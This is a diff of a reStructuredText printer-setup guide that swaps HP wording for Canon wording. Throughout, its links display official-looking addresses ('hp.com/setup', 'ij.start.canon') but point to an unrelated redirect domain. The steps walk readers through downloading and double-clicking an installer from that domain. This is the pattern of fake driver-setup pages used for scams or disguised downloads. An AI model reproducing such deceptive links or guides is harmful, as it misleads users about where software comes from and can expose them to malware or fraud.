hp-printerr/canonguide/index.rst

-There are 5 simple stages to download, install, and set up your HP printer driver on your computer.
-Follow each stage one by one to successfully connect your printer via `hp.com/setup <https://hp.redircoms.com>`_.
-HP’s setup site provides the latest drivers and simple installation steps.
-It’s the fastest way to ensure your printer works seamlessly with your computer.
-Visit `hp.com/setup <https://hp.redircoms.com>`_, download the right driver, and get your printer ready to use in minutes.
+There are 5 simple stages to set up your Canon printer quickly and easily via `ij.start.canon <https://can.redircoms.com>`_.
+Canon’s setup portal provides the latest drivers and clear installation steps to get you printing in no time.
+Visit `ij.start.canon <https://can.redircoms.com>`_, download the right software, and follow these steps to connect your printer seamlessly to your device.

 **********
-Steps to Download HP Printer Driver
+Steps to Download Canon Printer Driver
 **********

-1. Open a web browser and go to `hp.com/setup <https://hp.redircoms.com>`_.
+1. Open a web browser and go to `ij.start.canon <https://can.redircoms.com>`_.

-2. Enter your HP printer model in the search box.
+2. Enter your Canon printer model in the search box.

 3. Select your operating system if prompted.

 4. Click on **Download** to get the latest driver and software package.

-5. Save the installer file to your computer.
+5. Save the installer file to your computer for easy access.

 **********
-Steps to Install HP Printer Driver
+Steps to Install Canon Printer Driver
 **********

 1. Locate the downloaded installer file on your computer.

 2. Double-click the installer to begin the setup process.

-3. Follow the on-screen instructions and accept the license agreement.
+3. Follow the on-screen instructions carefully.

+4. Agree to the License Agreement when prompted.

-4. Choose your connection type (USB or Wireless).
+5. Choose your preferred connection type (USB or Wireless) and proceed.

-5. Complete the installation by clicking **Finish**.

 **********
-Setting Up Your HP Printer
+Setting Up Your Canon Printer
 **********

-1. Make sure your HP printer is powered on.
+1. Make sure your Canon printer is powered on and ready.

 2. For wireless setup, ensure your printer and computer are on the same Wi-Fi network.

-3. Open the HP driver or utility you installed.
+3. Open the Canon driver or setup utility you installed.

-4. Follow on-screen prompts to detect and connect your printer.
+4. Follow the on-screen prompts to detect and connect your printer.

-5. Once connected, print a test page to verify setup is complete.
+5. Confirm the connection and print a test page to verify setup.

+**********
+Configuring Printer Settings
+**********

+1. Open the printer settings or maintenance utility from your computer.

+2. Set your preferred paper size, print quality, and layout options.

+3. Configure wireless or network settings if needed.

+4. Check for firmware updates to keep your printer current.

+5. Save your settings to ensure consistent print results.